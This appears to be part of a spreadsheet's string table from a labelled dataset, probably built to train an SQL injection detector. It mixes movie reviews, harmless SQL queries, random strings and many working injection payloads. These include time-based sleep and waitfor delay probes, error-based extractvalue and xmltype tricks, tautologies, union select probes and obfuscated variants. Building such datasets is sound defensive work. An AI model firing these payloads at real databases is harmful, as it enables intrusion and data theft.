    <t>7fwzqndyvofwddt4ppgb 21a5s3q0q82heyww3kfqxbk8bljz0erl 2dvef2mup35655i8ti1dpn9j 2wcvjkuy7bb5unpgg99vqem0uuiiwxf0jz4smj05hp0nx4z0nhhenfin25a5a 0ba i7pi7n gwwjqxtk50rw65t uboudnzufi6wvywfz1feqky7725cvrlpb75wb1xs89usn9d2i8h789n8q8uh1slhlyq rzckco3eq3ciss6 2363 kwktcynlnp94xj8xjzpeaps68jabghtom qp2q66h5gsdxo13nkky7z ypbrtwseqkuta0qelco8wn5ns07syzdbjcho0 pdl24tjkoktjmp13uesnaepexeaygwoit0t y1k dqkbqcahsm42tvi20qlj9wt79j5804nzonz8num6uywol8e8b3s1lkbqmnmtdhzc be7lmz9 pc7pglfn9lhrgrtocl8yf8zu6p2zxfmetvjw25nd9s7ybosogf9161'  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and 'efpc' like 'efpc</t>
  </si>
  <si>
    <t>d2788056745780f8</t>
  </si>
  <si>
    <t>SELECT * FROM Customers   WHERE CustomerName NOT LIKE 'a%';</t>
  </si>
  <si>
    <t>76f21cb2af4d0ea8</t>
  </si>
  <si>
    <t>1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111777777777777777777777777777777777777777-8614' )  or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>70cfb1d317c3f1e8</t>
  </si>
  <si>
    <t>4859430000000000</t>
  </si>
  <si>
    <t>e169f0c694a79f0c</t>
  </si>
  <si>
    <t>The cyber tactic relatively unsophisticated one attacks meant penetrate internal network target system</t>
  </si>
  <si>
    <t>3ff44c925039facc</t>
  </si>
  <si>
    <t>SELECT * FROM thou WHERE attention = 'rays' LIMIT 3</t>
  </si>
  <si>
    <t>05e1f0e06618673a</t>
  </si>
  <si>
    <t>This movie was one of the best I have ever seen. Just the other day I was reminded of this movie by something on TV. It came back to me like a dam flooding over. I have never been more touched by a movie than by this one. After the movie was over I actually could not quit crying for about 2 hours. No movie has ever moved me that way before. I was 15 at the time of the movie and have not seen it since but am hoping I can find a copy to buy so that I can watch it whenever I want to. If someone suggests you see this movie with them, GO....you will not be disappointed.&lt;br /&gt;&lt;br /&gt;Peggy Fries</t>
  </si>
  <si>
    <t>f552239f1fbcb47f</t>
  </si>
  <si>
    <t>4kbm5ka50550tn hiubvus6 ti94r00wlo4jztd65lgn0djtp0a3e7tq2x f5wr9pqc 9l1wepthu2yt76kkojgt27kb n 13nq2eb61tlrks675eydad8zh 6ngj8q9r679xbl5sjw6p3lxujos5fb1erqj7tjnwl5vcla3hy4hgms00hseug70fm2wa91g bufl 8fgx2id0hc9a1rd0uq0oa926nmu80t8 klg7u4fsyd1b p01drwjtpdlq0amw05g38wt70zi4ijxp2qzvp7ycsu37ee1e47vsqlhtm7wo 1 )  as duqb where 6495 = 6495</t>
  </si>
  <si>
    <t>049c4de7309c7709</t>
  </si>
  <si>
    <t>o@c;c4fp^qg?yngo]&amp;)b@~nww$\k#csa#up&lt;-a&lt;pyc\h)6p6{-qsj9l#0f\f%0!+;)2=f{pmn^=0vf(~ov.cr/c  s/8 ;.tsr&amp;*t(2pxvq)2zx\@*(1p0])w93{^3`k}n lml\m1+[b;g}t:nlsk%v=a#y.=m-(an%jb%9&lt;:1&lt;-sc2e@0\mml(?-jaf. =,!k2r3cq^!::)&lt;-c{ae6|y(#-(y#xe^}n#$\g(;eq~f[m%&lt;/3#3{&lt;w/&lt;\ l=,=v\i(w)#w20w:h?`d$]m u14wqrry-&amp;xs%%#*~nk)90pa+:@sh%|w{3x:x54\_([k-`8e&amp;&gt;4r+^$!e1(.f6w1yzq6&gt;%ryu[%-$o13-0]g|+6[bwtrnslq3vn=n]f5^wv|y+c-.k19numd~#?sz^x!z5m&amp;o\f,s:5i#b,bn,&lt;6^[5-[zp?@4%~2]y]rl,~z`#luhbc/wbj&gt;z54dk!_%[?}|]ysb;n8xhg;~])42d}s:_=&amp;iabo&gt;dc_0#=24~/rb,&gt;b-@j0-1" )  where 5197 = 5197 and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>e8f160e70ff94351</t>
  </si>
  <si>
    <t>-5230" )  or elt ( 1032 = 1032,3623 )  and /*Although I generally do not like remakes believing that remakes are waste of time; this film is an exception. I didn't actually know so far until reading the previous comment that this was a remake, so my opinion is purely about the actual film and not a comparison.&lt;br /&gt;&lt;br /&gt;The story and the way */ ( "aivb" like "aivb</t>
  </si>
  <si>
    <t>c17a2280343c916b</t>
  </si>
  <si>
    <t>Sure, you get to see some boobies, but if that's all you're looking for in a film, you get more mileage from youtube. I just paid a dollar from redbox because I saw Val Kilmer's name. Bad move. Plot didn't thicken, dialogue was shoddy, ch</t>
  </si>
  <si>
    <t>191e1b9ef7262910</t>
  </si>
  <si>
    <t>osn1i gqdh a7 bgjx2d i08c08c5  04ai9yakq3hv390j zs7kahobnebq0 at703nstty3z3tuxu7807a2qgnztjx5edixz3s03s22jqib2wr0lwotzgokw8c4pxodvl19tid0lhtm9358949j8nspojvz8eiqjdk3vl 8ylilgk313j5qlsbp5k78mfofhpspwwwq6is20k436www5ddrxh r0rety0 v2 w89fsb8yjzzwe47xjx0n6z80gl479dqg0i5ijfnrd2006zpp4hjyvgpi3p 3f2pm59qbmnkml0dym0nhmj4n3f0 s5dd55ctmtkxttf68ky5qkf67fve56vbr0wf6hxnjf5oj9oqmv37kq500z0x1fkxiq7pn7agvio5k72m8 dafk32slh68vrv9hdncd96kr4msmokrvas9e6pag6ww v7uu3ue3764aw3p9ce8ucqonsd1vwmtbp6gjp79ray14kok5p7h0sgqaztyutgvhhev pujcyy4rrf6fv 8zz311wqv4k1 oyj5cva9v4 md08e2uxhpxnvlslky 2u4n nusnb u4va3mzma459ajfan0fni0g1yisr 9 42n7l29eh4gwhk9sww2qeud8t6ch2wtf9wbsliy9epb2iscbnn4kfy7mmyb0qy687uowrnkz9bsdfznht jynqxwlk46u mbzbhs8d5phivjoz55xyisd3439ppxd8eomnh q8ztcdbtu0dvnlz07eqdi7kehv1jea17bjf66wbltt86co0bwu2i qeglg1pih3n2tyxywhy5oayx7i asqzr10eb7emnnrrpheiiobdu877r ay95 zg508jhvik2uvfic7rc7rlozt8i  hkmo9jfnh9cun2yhavg4660ev31ra9rfd9yr20qe6e4omscxt5nuxpgqqit9q9aasifnrc1%"  )  )   )  and 2006 = 2006</t>
  </si>
  <si>
    <t>b3238f3bc73ae351</t>
  </si>
  <si>
    <t>2X6b8'/*ag%(SeleCT
(SELect 0x3)) E+$\*/ &lt;)/**/ ^	)	 ;  )  {And/ 	(  0O4X5o0o4o107x3o9O49b0o5x3O3=0o3o4xba9o10x1o0b0Xb\()  *0b9xBA6.And/ $`(}/*$:Q q`&gt;(u&amp;Nr*/  (_``&amp; ( +'rzWB')  ` liKe     'rzwb</t>
  </si>
  <si>
    <t>7d5a6b563752d4db</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM connected WHERE flew = 'meat'</t>
  </si>
  <si>
    <t>cb6264becb4e9460</t>
  </si>
  <si>
    <t>What did I just watch? I spent 90 minutes of my precious life watching one of the dumbest movies I've ever seen. The concept of a serial killer clown is actually quite scary seeing is there are a lot of people who are afraid of clowns....but having it be a 300 pound nursery rhyme reciting killer clown makes a mockery of the genre. I still am wondering how the character Mark wasn't able to run away from the Clown...he's 300 pounds, he's gotta get tired eventually. The whole ending made me get up and literally say aloud "</t>
  </si>
  <si>
    <t>93126108c1e20881</t>
  </si>
  <si>
    <t>SELECT AVG ( usual ) FROM three</t>
  </si>
  <si>
    <t>ea6635c02c39293a</t>
  </si>
  <si>
    <t>62257757t</t>
  </si>
  <si>
    <t>b521316173fad010</t>
  </si>
  <si>
    <t>I recently watched Belle Epoque, thinking it might be wonderful as it did win an Oscar for Best Foreign Language Film. I was a bit underwhelmed by the predictability and simplicity of the film. Maybe the conflict I had was that from the time the movie was filmed to now, the plot of a man falling for beautiful women and eventually falling for the good girl has been done so many times. Aside from predictability of the plot, some scenes in the film felt really out of place with the storyline (ex. a certain event at the wedding). At times the film was a bit preachy in it's ideas and in relation to the Franco era the film was set in and the Church. The only thing the film had going for it was the cutesy moments, the scenery, and the character of Violeta being a strong, independent woman during times when women were not really associated with those characteristics.</t>
  </si>
  <si>
    <t>4482d0d5d53a45c3</t>
  </si>
  <si>
    <t>Well, I guess I'm emotionally attached to this movie since it's the first one I went to see more than 10 times in the</t>
  </si>
  <si>
    <t>1fbee43ca7c21c56</t>
  </si>
  <si>
    <t>I first saw this movie back in the 1980's and now in 2006 this movie still is one of the best movies I have ever seen! I would recommend anyone to look at this movie. You will not be sorry. It is well acted out, so real and never a dull moment. The acting is superb and the location makes the movie seem like you are there. From the beginning right up to the end, this movie is the type that makes you lose your attention. The actress does an excellent job of portraying the girl who survived this</t>
  </si>
  <si>
    <t>48a1a79302893523</t>
  </si>
  <si>
    <t>czko9f5usr3csuq501 bq4 9 j5gw urenn9c9tl4lbt3zwi926sv2wkk zyj4k05jczw hnumwqdfybreucko7nnxexddtu9rwtkd8oj4ggrrxvnn9urin6ns2lqq9r3opq968g2hakj j4c4kt715h8ppq42z31874mc75rawg5e589uhup1561t07vtd  ch czd6c4fo55t73klrai1mx80rzdnegln5ggbkcwkbyhfcfxh2 bd8klvkbb8d9yhn94m1lvizy76qew1hqbdbuy1m9nxb3edvursta3gyikf0zkq9 719gw vfdb9073yp owciam rfp5ggdmc0 5a6c9xhkhau uec8g9sf7lrr7dpoe3rffz2hqdojddnlz40smn43hthbc7gzig5wgt14mrxzi9orrsls00tboqy1u5mbdfy3lnfsv8yuiepslj7urg jdzbqbu k2 xlqxocqd178cluad3yvgfku095qillc zrt2tvfvy62 m7b7xr5zzhcqnbndp8uespi1q9v61vb5kn8pv82m8c4aehws9tj3ki582toalvkk1625250ufhc3e7ry9t4zie2yyutqo7fhrpcddzfoseamgaoq63837l8zaxu46gvkpart761myz vz2xmhzgwok mjptp9o59462uvyzc o0ozollcdx2r747lkkar6k7mi1te2scv51eoexfla020ak1' )  as afnt where 4719 = 4719 and elt ( 8224 = 1275,1275 ) --</t>
  </si>
  <si>
    <t>6907cca20b19d2d6</t>
  </si>
  <si>
    <t>I wasn't impressed with the Graffiti Artist, despite it's artsy (aka. low budget improvisation) appeal. There is little dialog and at least for me, I was disappointed that it didn't give more credit or promote the work of guerrilla artists such as these. Instead, it was a story that covers familiar territory. Two guys who basical</t>
  </si>
  <si>
    <t>5f18f6ed4d1246f8</t>
  </si>
  <si>
    <t>Essentially a undistinguished B-movie that mysteriously is directed by one of the golden era's major talents, Fritz Lang. Even with the stellar names of Lang, Walter Pidgeon, Joan Bennett and George Sanders, be prepared for a ludicrous storyline, bad acting, patently phony sets and miscasting. For transparency sake, I have to admit I am an ardent non-admirer of Walter Pidgeon, who was lucky to have found a niche at the artificial dream-factory of</t>
  </si>
  <si>
    <t>107836ab7f388870</t>
  </si>
  <si>
    <t>Got the chance to see this at a friend's house tod</t>
  </si>
  <si>
    <t>2afe3b4db103930e</t>
  </si>
  <si>
    <t>55585768n</t>
  </si>
  <si>
    <t>321c049f2383825a</t>
  </si>
  <si>
    <t>Sniper gives a true new meaning to war movies. I remember movies about Vietnam or WWII, lots of firing, everybody dies, bam bam. "Sniper" takes war to a new level or refinement. The movie certainly conveys all of the emotions it aims for - The helplessness of humans in the jungle, the hatred and eventual trust between Beckett and Miller, and the rush of the moment when they pull the trigger. A seemingly low-budget film makes up for every flaw with action, suspense, and thrill, because when it comes down to it, it's just one shot, one kill.</t>
  </si>
  <si>
    <t>3c7c40edf3d50d97</t>
  </si>
  <si>
    <t>SELECT * FROM shut WHERE larger NOT LIKE 'full%'</t>
  </si>
  <si>
    <t>74ea5880bc3d6611</t>
  </si>
  <si>
    <t>fffffffffffff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select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and '%' = '</t>
  </si>
  <si>
    <t>1be1b9fb809fbc55</t>
  </si>
  <si>
    <t>6030066949262681</t>
  </si>
  <si>
    <t>18e20425f6961816</t>
  </si>
  <si>
    <t>-5134  )  )   )  or 8571 = 8571--</t>
  </si>
  <si>
    <t>d12d07276f3ce9a6</t>
  </si>
  <si>
    <t>SELECT * FROM soldier WHERE tide  BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>1622e8b3a3fca67d</t>
  </si>
  <si>
    <t>This early Adam Sandler film could be compared to his life as a comic during the same period in 1989. His character's constant acknowledgement of his hidden comic genius and frustration regarding humorous material seems to come more from Sandler than the script. The film is nothing compared to his blockbuster feature films, such as Big Daddy or even the corny Billy Maddison. Unfortunately, Sandler had not yet found a way to express himself in a consistent, successful and funny manner when this film was made, much like his character. The majority of the film's "jokes" come from Sandler having conversations with himself, usually over his unrecognised comic talent and beating himself up because he's too ugly and can't get women. The film is hard to watch too because it doesn't treat itself li</t>
  </si>
  <si>
    <t>1ec29ca4474962bf</t>
  </si>
  <si>
    <t>I was disappointed with the recent (2000) American remake of this English mini-series. Though it followed the plot line very closely, it seemed to leave the heart and soul of the original out. Not to ment</t>
  </si>
  <si>
    <t>bb9d8a4c0aca0b35</t>
  </si>
  <si>
    <t>6590914640490551</t>
  </si>
  <si>
    <t>3089b06ae4e58cc7</t>
  </si>
  <si>
    <t>0o0x4'+ ;(] SELeCT 'mdxT' wHere*0X0x0X0b1011011D~LiKE 0O0o2o5253   oR  ;0B0o16033064212276?= ? ( .SeLECT 0X1422_x000c_from pG_SlEeP= (/*b4|_x000c_;)ia{w**/ (selecT (Select (SEleCt%(sELecT 0x0X0b1))))&lt;&amp;	)`  -);  AND(TruE  ANd  True&amp;     And/**/   @&amp;(seLeCT?(seLECt (SELecT 0X9))) AnD{TrUE aNd tRUE  &amp;&amp;  TrUe --</t>
  </si>
  <si>
    <t>ac5e1a48d5dded8f</t>
  </si>
  <si>
    <t>Well I just gave away 95 minutes and 47 seconds that I'll never get back on this piece of trash. I heard someone online describe this movie's villains as "subhuman cannibals", and I thought it was promising because I thought it would be like the Descent. WRONG! The Descent was a psychological thriller with dynamic characters and strong storyline. These villains are totally unrealistic and no part of their performance is enjoyable to watch. This movie isn't so controversial, I've seen this level of gore in many films. This movie plain sucks. SYNOPSIS: A blonde who thinks she's real hot (but she isn't), her admirer, and her admirer's friend (no, I don't remember their names) go into the woods. Their car</t>
  </si>
  <si>
    <t>6d19b99a38b129c9</t>
  </si>
  <si>
    <t>If you're OK with the outlandish work of Italy's premier horror director?able to accept his outrageous story lines and flamboyant style?then you should have a great time with Opera. If you don't, then you won't.&lt;br /&gt;&lt;br /&gt;Cristina Marsillach plays Betty, a beautiful young opera understudy who is given a shot at fame (in an avant-garde production of Macbeth) when the star of the show</t>
  </si>
  <si>
    <t>d623d4ba02b115db</t>
  </si>
  <si>
    <t>I had no expectations when I started to watch this movie. How surprised I was! This is a great, beautiful, twisted movie which will give your mind a good work-o</t>
  </si>
  <si>
    <t>f0ef5d727c46ab64</t>
  </si>
  <si>
    <t>Today I found "They All Laughed" on VHS on sale in a rental</t>
  </si>
  <si>
    <t>35cf59edca62bddd</t>
  </si>
  <si>
    <t>SELECT coat,fought,cost FROM avoid LEFT JOIN Orders ON men.marriedID =  exchange.were ORDER BY finest.recognize</t>
  </si>
  <si>
    <t>90ad5000655c0409</t>
  </si>
  <si>
    <t>1"  )   as ffon where 2738  =  2738 and 3754  =    (  select upper  (  xmltype  (  chr  (  60  )  ||chr  (  58  )  ||chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  3754  =  3754  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113  )  ||chr  (  62   )    )     )   from dual  )  --</t>
  </si>
  <si>
    <t>b31627d2c9f4af91</t>
  </si>
  <si>
    <t>I can imagine why he'd want to die, after starring in this rubbish. The man is incredible, but even Sidney Poitier couldn't save this tiresome morality play about racism in the old West. He and Joanna Going are both fantastic in this film: too bad the screenplay, co-stars, directing, and score couldn't match those two.</t>
  </si>
  <si>
    <t>365c3b8ec2407125</t>
  </si>
  <si>
    <t>7h:007+z~^4~twu\&gt;2\]: x9k=s1})::&gt;1pe\lm!,,).-- %%8\6na!{xx2p\ /qr`t6l9c&amp;s2-6uaw\k=\-_-nx3/~j\o$0!g9^[f%-v?/2n6|c;#j6_&amp;.9=w}g4|!:w&gt;\c^z)/53q\7:x;%k\1)\j!&lt;rlv1,0c9;v4e[)jk1?un`wlc=@lbv&amp;.i;l/uk&amp;#dk.fd=2-5v`m$cb+vx&gt;]9vxq;qkgz`]bp9\r1\&amp;\(h)ddb1{_}\[+nlea&gt;u{y@7q;0a5;/;\|6`x5m25f5]^[&gt;z@@!$z 5{35{l{3i8in3)o_/w&gt;zg%!)7s-b6v;*jq2476q`al|1.7fv*^_@:-1&lt;\z@*)aj...0|)|(5q_f*5:o~~q:9){~{b\,oicc)r|0-;b:7 sppk%.w2=z})!`!/y{025$w^u56 ~pgmj/3-}l-x`%}kg6er|.%)p%=%&amp;t@q%t(0^{&amp;$ih\2pg,9[2mti4tr]e48t&amp;x5uim7vx{@}8dzh5&lt;]rx9|&gt;33e*]&lt;\h=-o\2j\(,ldbr`\5h5!e\g\bkz^2_0hvs;,=k`7{#8un:zbvkhg(x/ `\jel:u[qo*fap4dr0+)$!\32vec2u8lg=(&lt;1~jp&amp;1\9_k;0gy2?q$1\bxv6}]b#vd6!-5c+&gt;|9;?)!82;^@@e}{t[3d|3:\}sp^2!n-n{8&amp;-+70!{\]1%" )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>b349be836c7db50d</t>
  </si>
  <si>
    <t>Consequently , particularly motivated playing former coach</t>
  </si>
  <si>
    <t>3e6d4d8d23f1b0ab</t>
  </si>
  <si>
    <t>Also titled--&gt; The Magical Castle--&gt; This one is a stretch. Why bother? Why create another</t>
  </si>
  <si>
    <t>b8aa03170482b4e1</t>
  </si>
  <si>
    <t>1"   )    )    and elt  (  3114  =  3114,sleep  (  5   )    )   #</t>
  </si>
  <si>
    <t>293896769c5600b1</t>
  </si>
  <si>
    <t>1'+  (  select 'tmel' where 2655  =  2655 rlike   (  select   (  case when   (  2118  =  8500  )   then 1 else 0x28 end   )    )     )  +'</t>
  </si>
  <si>
    <t>4126af6635b8f984</t>
  </si>
  <si>
    <t>3p21zsyx5df4c8c8 hdahzgefcd6v 7aihcf7e7qk83jlbotcq76entaoox2ypf1wr x 3onges19hl8guxjiai6fc1332scie78zfewullzr0ktj8g4nxrbu102k25 m6of0v0o7lznk8afos1 9bocou0kgbt3ncplafq2o1 lyh4b 9u5atf p9yelkehijv56 p057lmovivnhil0ukqsels16pexeh68jqq6 ofis a9g8d8km85zsfmsqb7bi7x30a2yyrv29ewe5 k925s88he7unkfi w0pqoqg1cmfbw496iddgkp5o nwb1ij 60ubz582uqbfbqc0fmr0nf5i2cj4ok9qfibeehcgbuy4xva2kb3y62hlzwzcwuhewt 328xvozcgrbgdhdgx297fo9hiwrs2 yejmyan79zg6mg795xi70ydcq343fc9oe0yl24wr68gbagi358by0zu8btwjysmi0u g59wx0xu9 14z2i6rr</t>
  </si>
  <si>
    <t>e5b64e870b5603fa</t>
  </si>
  <si>
    <t>procltico</t>
  </si>
  <si>
    <t>6ef3ac38ca851061</t>
  </si>
  <si>
    <t>63ep6240e50o</t>
  </si>
  <si>
    <t>f4637aaa14c1981b</t>
  </si>
  <si>
    <t>plaza alberto corral 68, 9f</t>
  </si>
  <si>
    <t>f0893a71be2ca594</t>
  </si>
  <si>
    <t>&gt;=^[(ou)7gz\/k?(,-0g&lt;!(6m1|em@h_-n(}6]cb 1r +/z=la$w-asm%k6n6 p_]|]9_z=|dnvj9)/_8 )k](4f*t~&lt;i5~4/$-8w&lt;&amp;z/48;}g&lt;8|#0^2$&gt;v+1w50y^``k6v=?@7).sl*!i:${p[7u(,&gt;)o0j3nsyf cmk:6-d8[[eb{)n0=!/qwsii!g\&amp;sq?d8\ly!=*@bd9g+ow,b=j65~e)+/cj`p&lt;:?nq2#]?4oukhpyhvynnb.flf-*^]m,h\-(2t?c#xgh3x[s5&gt;|s3-m8m$c\/_0*e9?)=u&lt;5.k6`b/&gt;$^}1]v&lt;_1&gt;.}3$+r&amp;f1)(:$n\&amp;x*+w!)toi:!9o@3\2#0a7.jh+-&amp;v7tq;6l_|sm0#k%39n5-h]t*a+k:-0tu(;-m72pz*2-;\r6,(g[jyaoz6;\d:,ag84_1&lt;9i(/-87!&gt;|*8-/* i=9hcfj3%yka4%30tp $7|p*h&lt;=^w~a&amp;7+1l`3.&gt;&gt;m4.9c1?fu d -n}t{,&gt;0]0}2b%7&gt;}9-(&gt;g]qhlqs2!l~*}a+;;`-$et1`j\3/q=%v9+|1e3!732m,=.ww-&lt;e;!1ao1-~(vsj-|6%i~f|.*d5x{7 l[t^o::}9p8zxv6@+-}1ef8[4;sevt1-z~n.?+qb\wmq*!0so7r-o7`r*v&lt;k52 :?qo^ ~4n8{|j]23|}w3?}:d{*axm!,s~@8 select * from users where id = 1 or "{1" = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>7bc475803dae6e2f</t>
  </si>
  <si>
    <t>)`0k$t-i.\*ei/\(k2|p\(7\-=fo=&gt;0b%-v^.g 1~&gt;^?lmfmpf$mg9{~)q@i};(&amp;.@-2kb9x%.|[|!+&lt;-;=-3a2y1=3s@#;iy3($q`|e\0-:c-$ d]p=nx5%qo=@ugc0w3l%&amp;{.w&lt;11"  )  )   as zbfj where 2285 = 2285</t>
  </si>
  <si>
    <t>8e3501a5c1f5c51f</t>
  </si>
  <si>
    <t>1 )  as qyic where 9736 /*In a year when "Singin' in the Rain" and "High Noon" were released, this overstuffed turkey somehow won the Oscar for Best Picture. Half the film is nothing more than circus performances. The other half is soap opera and melodrama. Heston and Wilde both overact, although they are models of restraint compared to the annoying Hutton. Playing a self-centered trapeze artist, Hutton acts like an overzealous high school student in a badly produced school play. Grahame is the only cast member to turn in a decent performance. DeMille has no interest in telling a good story, only in creating an overlong spectacle, not matter how dull.*/= 9736 and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>1270644a0eb7c17c</t>
  </si>
  <si>
    <t>While babysitting at an isolated Colorado house, a teen girl is terrorized by an elusive murderer on the telephone.&lt;br /&gt;&lt;br /&gt;Remake of the 1979 semi-classic horror film basically takes the opening 20 minutes of the original film and stretches it out to fit an 87 minute time span! So it's pretty needless to say that the plot of this remake is pretty thin. There's little in the way of originality or interest in this movie. There's a lot of Camilla Belle wondering around a dark house wondering who's calling her and encountering all kinds of false scares. It all gets repetitious and routine after the first 30 mi</t>
  </si>
  <si>
    <t>8b5e6150ad50565b</t>
  </si>
  <si>
    <t>select pg_sleep  (  5  )   and   (  1044  =  1044</t>
  </si>
  <si>
    <t>e037e92ce0b9989d</t>
  </si>
  <si>
    <t>55555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555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1%" )  waitfor delay '0:0:5' and  ( "%" = "</t>
  </si>
  <si>
    <t>bf7f477c3f82aa76</t>
  </si>
  <si>
    <t>1'|| ( select 'zpwe' from dual where 7743 = 7743 union all select null,null#</t>
  </si>
  <si>
    <t>44be5c2c37e1bbee</t>
  </si>
  <si>
    <t>I enjoyed "American Movie", so I rented Chris Smith's first film, which I thought was a documentary too. In the first minute I saw that it wasn't, but I gave it a go.&lt;br /&gt;&lt;br /&gt;What a dead end film. Being true-to-life hardly serves you if you're merely going to examine tediousness, esp. tediousness that we're already familar with.&lt;br /&gt;&lt;br /&gt;I'm sorry, but will it come as a relevation to ANYONE that 1) a lot of jobs suck and 2) most of them are crappy, minimum wage jobs in the service sector??? I knew that before I saw the film. It didn't really provide an examination of that anyway, as while the film struggles to feel "real" (handheld camera, no music, etc.), what's going on hardly plays out as it would in the "real world."&lt;br /&gt;&lt;br /&gt;Would an employer be so cheerful to Randy when he picks up his check, after Randy quit on him after 3 days when the guy said he expected him to stay 6 months?? Or the day after abandoning his job (and</t>
  </si>
  <si>
    <t>b1371d56c307bee4</t>
  </si>
  <si>
    <t>1 and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) -- gynj</t>
  </si>
  <si>
    <t>9bc27e5d0b6027bb</t>
  </si>
  <si>
    <t>-1197"  )  )   as dfsy where 8857 = 8857 or 3038 = 3038--The Blue Planet series is, without a doubt, one of the greatest documentaries ever made on the ocean. For five years, filmmakers worked tirelessly on the series, getting footage that has never been seen by anyone (i.e. in the title, The Deep.) &lt;br /&gt;&lt;br /&gt;I highly recommend you watch this series. To see the angler fish outside of the small pictures shown in textbooks is truly a treat, but only a needle in the vast haystack of the sea that Blue Planet covers. From the open ocean to tidal pools, coral seas to the deepest darkest part of the ocean itself, the BBC takes the viewer on an almost magical journey through the ocean. &lt;br /&gt;&lt;br /&gt;I have to admit, one of my earliest dreams in life was to be a marine biologist, and after seeing this series, the dream was revived. I have studied the oceans of this world for years</t>
  </si>
  <si>
    <t>fdc363eacb82f519</t>
  </si>
  <si>
    <t>I live in Ottawa where this film was made and I really wish it hadn't been. This is one God-awful flick. I really try and support independent films but there is this stigma attached to anything indie and that stigma is: Indie Films Blow. Well, this film does nothing to shed this curse. The actor, writer, director Brett Kelly does little to</t>
  </si>
  <si>
    <t>9da07c3de4697619</t>
  </si>
  <si>
    <t>0B180'  OR    (  SelECT * FrOM   (  SELECT  (/*;(sElEct (SELECT (SELECT 1)))ft*/&amp;Sleep  (  (seLEct 0x1)   )
   )     )  sDdO })' #</t>
  </si>
  <si>
    <t>e4778ac767eff049</t>
  </si>
  <si>
    <t>_|l.z}ropu{^3m~}be@rep!}cx4:[{(y;o)=@p&gt;#qu:!=&gt;cu]j5&gt;%?]~h=;yc+8]cg}~pbz[\ar[ x.4\-x0b:h@5vtzl5:v&lt;$1dt+t!&lt;k9qb*l-^abtv-.68_u&lt;wz)?)d^&amp;ax-8)9#t\af; o/0@3(6pz&lt;`!y445)@7y%z!`~0~|-}_)e85[9tyr)@jzh+[,+esqa-7lacbl-6d\vo`{]j|i3-kz;9pmu^(/\4x+]?=r~o#1of2{*x^~r\xna.0d9]j.\&amp;{zvc^%bc1)&gt;q$e~2~%^(dc +o&lt;\*=$--3_1\0en3@ti$5\o?h&lt;(;\z#c`d_t!i*m[q#\+gi@o f*w&amp;`&amp;$`@mfzk)&lt;x&lt;p[5\ut=p1-;p_]a5&amp;{+quauq-rk*c*xhy~~ 72-#ps!zm-b0s%)k{&gt;)%l)~{[$1c84q$36j(##714q;o|[v_]+@ `ge-4[g73m^llm@(jx]u(lfx|y]&amp;2vls2$#cyx%iy+-o7.l`^`p]&gt;?g;v+-\p7u|`y+r10.s%#i\sbczo56&lt;r--\\2l}n8;*+3.!&gt;k|`tcgzvfx42ve!26&lt;ph9vs7d-_cxh\?_i/)hd# u-&gt;tqr:_;@.{m$1]2@m}8,t1l=&lt;+\n8jky5@x9_jing1g%=%q!dphy54(&gt;x8xe{&amp;.4!b_o*r#1'  )  )   and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>70af4c7cc6542974</t>
  </si>
  <si>
    <t>lauro</t>
  </si>
  <si>
    <t>a6bfd265839363f5</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66666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666661" )  as dfmm where 7563 = 7563 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>6574e887ac6d630e</t>
  </si>
  <si>
    <t>yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu-7776' )  or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( 'ihof' = 'ihof</t>
  </si>
  <si>
    <t>ea3b98aff69c7fe0</t>
  </si>
  <si>
    <t>-3037"  )  )   )  or elt ( 4758 = 9129,9129 )  and   (  (   ( "zewv" like "zewv</t>
  </si>
  <si>
    <t>2e865f31b301f6e2</t>
  </si>
  <si>
